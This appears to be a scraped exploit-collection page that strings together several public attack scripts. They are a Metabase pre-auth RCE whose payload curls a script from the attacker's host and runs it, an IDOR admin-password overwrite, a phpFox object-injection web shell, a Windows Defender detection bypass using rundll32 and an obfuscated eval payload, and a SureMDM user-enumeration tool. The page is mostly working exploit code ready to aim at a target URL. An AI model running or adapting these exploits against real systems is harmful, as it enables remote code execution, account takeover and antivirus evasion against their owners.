payload2 = { "token": setup_token, "details": { "is_on_demand": False, "is_full_sync": False, "is_sample": False, "cache_ttl": None, "refingerprint": False, "auto_run_queries": True, "schedules": {}, "details": { "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl {argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')\n$$--=x", "advanced-options": False, "ssl": True }, "name": "an-sec-research-team", "engine": "h2" } } output = requests.post(f"{argument.url}/api/setup/validate", json=payload2) bind_thread = threading.Thread(target=bind_function, ) bind_thread.start() #updating the payload payload2["details"]["details"]["db"] = f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {command}')\n$$--=x" requests.post(f"{argument.url}/api/setup/validate", json=payload2) #print(output.text) def bind_function(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(("0.0.0.0", argument.lport)) sock.listen() conn, addr = sock.accept() data = conn.recv(10240).decode("ascii") print(f"\n{(b64decode(data)).decode()}") except Exception as ex: print(colored(f"[-] Error: {ex}", "red")) pass if __name__ == "__main__": print(colored("[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]", "magenta")) args = argparse.ArgumentParser(description="Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]") args.add_argument("-l", "--lhost", metavar="", help="Attacker's bind IP Address", type=str, required=True) args.add_argument("-p", "--lport", metavar="", help="Attacker's bind port", type=int, required=True) args.add_argument("-P", "--sport", metavar="", help="HTTP Server bind port", type=int, required=True) args.add_argument("-u", "--url", metavar="", help="Metabase web application URL", type=str, required=True) argument = args.parse_args() if argument.url.endswith("/"): argument.url = argument.url[:-1] success = False exploit()
HireHackking
# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over # Date: 2023-12-03 # Exploit Author: OR4NG.M4N # Category : webapps # CVE : CVE-2023-38965 Python p0c : import argparse import requests import time parser = argparse.ArgumentParser(description='Send a POST request to the target server') parser.add_argument('-url', help='URL of the target', required=True) parser.add_argument('-user', help='Username', required=True) parser.add_argument('-password', help='Password', required=True) args = parser.parse_args() url = args.url + '/classes/Users.php?f=save' data = { 'id': '1', 'firstname': 'or4ng', 'middlename': '', 'lastname': 'Admin', 'username': args.user, 'password': args.password } response = requests.post(url, data) if b"1" in response.content: print("Exploit ..") time.sleep(1) print("User :" + args.user + "\nPassword :" + args.password) else: print("Exploit Failed..")
HireHackking

phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit

HACKER · %s · %s

<?php /* -------------------------------------------------------------- phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability -------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.phpfox.com +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "url" request parameter to the /core/redirect route is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. [-] Original Advisory: https://karmainsecurity.com/KIS-2023-12 */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[+] cURL extension required!\n"); print "+------------------------------------------------------------------+\n"; print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n"; print "+------------------------------------------------------------------+\n"; if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n"); function encode($string) { $string = addslashes(gzcompress($string, 9)); return urlencode(strtr(base64_encode($string), '+/=', '-_,')); } class Phpfox_Request { private $_sName = "EgiX"; private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;"; } class Core_Objectify { private $__toString; function __construct($callback) { $this->__toString = $callback; } } print "\n[+] Launching shell on {$argv[1]}\n"; $popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"])); $popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain)); while(1) { print "\nphpFox-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n"); }
HireHackking

Microsoft Windows Defender Bypass - Detection Mitigation Bypass

HACKER · %s · %s

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Detection Mitigation Bypass Backdoor:JS/Relvelshe.A [CVE Reference] N/A [Security Issue] Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated. However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post. [References] https://twitter.com/hyp3rlinx/status/1480657623947091968 [Exploit/POC] 1) python -m http.server 80 2) Open command prompt as Administrator 3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp") Create file and host on server, this is contents of the "yo.tmp" file. <?xml version="1.0"?> <component> <script> try{ <![CDATA[ var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; var str = ''; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); } eval(str) ]]> }catch(e){ eval(str) } </script> </component> [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: February 18, 2024: Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
HireHackking

SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration

HACKER · %s · %s

# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration # Date: 05/12/2023 # Exploit Author: Jonas Benjamin Friedli # Vendor Homepage: https://www.42gears.com/products/mobile-device-management/ # Version: <= 6.31 # Tested on: 6.31 # CVE : CVE-2023-3897 import requests import sys def print_help(): print("Usage: python script.py [URL] [UserListFile]") sys.exit(1) def main(): if len(sys.argv) != 3 or sys.argv[1] == '-h': print_help() url, user_list_file = sys.argv[1], sys.argv[2] try: with open(user_list_file, 'r') as file: users = file.read().splitlines() except FileNotFoundError: print(f"User list file '{user_list_file}' not found.") sys.exit(1) valid_users = [] bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest" enumerate_txt = "This User ID/Email ID is not registered." for index, user in enumerate(users): progress = (index + 1) / len(users) * 100 print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r") data = {"UserId": user} response = requests.post( f"{url}{bypass_dir}", json=data, headers={"Content-Type": "application/json; charset=utf-8"} ) if response.status_code == 200: response_data = response.json() if enumerate_txt not in response_data.get('d', {}).get('message', ''): valid_users.append(user) print("\nFinished processing users.") print(f"Valid Users Found: {len(valid_users)}") for user in valid_users: print(user) if __name__ == "__main__": main()